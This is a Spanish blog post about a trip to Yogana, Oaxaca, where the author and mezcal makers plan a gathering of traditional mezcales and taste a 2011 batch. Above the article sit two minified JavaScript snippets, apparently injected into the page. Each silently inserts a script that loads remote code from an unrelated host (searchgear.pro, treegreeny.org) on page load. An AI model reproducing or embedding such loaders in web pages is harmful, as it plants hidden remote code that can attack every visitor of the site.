;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 114. Más notas de un viaje a Oaxaca

114. Más notas de un viaje a Oaxaca


El 3 de febrero fui a Yogana, Ejutla, para reunirme con Don José García, maestro mezcalillero que conozco desde 2002. Después de conocer las últimas noticias de nuestras respectivas familias, comentamos el evento realizado en septiembre de 2011 en Santa Catarina Minas, Ocotlán (impreso.milenio.com/node/902376 3), al que ambos asistimos. Entonces reflexionamos sobre la urgencia de llevar a cabo un encuentro similar, pero solamente con mezcales tradicionales [MT] de Yogana.

Ya encandilados con la idea, hicimos un recuento de los palenques -fábricas de mezcal- existentes en la población, de sus propietarios y de quienes trabajan en ellos, así como de los magueyes empleados en la elaboración de MT. Por razón práctica, se convino en que cada palenque presentaría sólo un mezcal para la reunión. La fecha: mediados de marzo.

Con tales avances, fuimos al palenque de Don José para saludar a otros dos maestros mezcalilleros que trabajan con él: Tío Higinio y Tío Miguel, que justo estaban en la molienda del maguey cocido recién horneado. Después de saludarnos con gran cortesía, me ofrecieron exquisitos trozos de maguey Espadín rebosantes de miel.

Fue entonces cuando Tío Miguel nos invitó a su casa para probar un MT que elaboró con maguey Espadín, maguey de Castilla y maguey San Martinero en 2011. Ya en su hogar, me tocó venenciar el mezcal y, por el perleado generado, los presentes concluyeron que tenía 52 grados. Como el mezcal estaba en ocho contenedores, me pidieron que venenciara el mezcal de cada uno de ellos  y, obvio, los probamos todos.

Antes de partir de Yogana acompañé a Don José al ayuntamiento, donde pude conocer al presidente municipal y aprovechamos para proponerle la realización del encuentro mezcalero. El manifestó la importancia que el MT tiene en la vida diaria de Yogana y de sus habitantes, y nos aseguró que contaríamos con su apoyo.

Quien desee saborear MT, acuda el jueves 16 a las 20 horas a Piloncillo y Cascabel: Torres Adalid esq. Pestalozzi, col. Del Valle, DF.

http://impreso.milenio.com/node/9111073

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *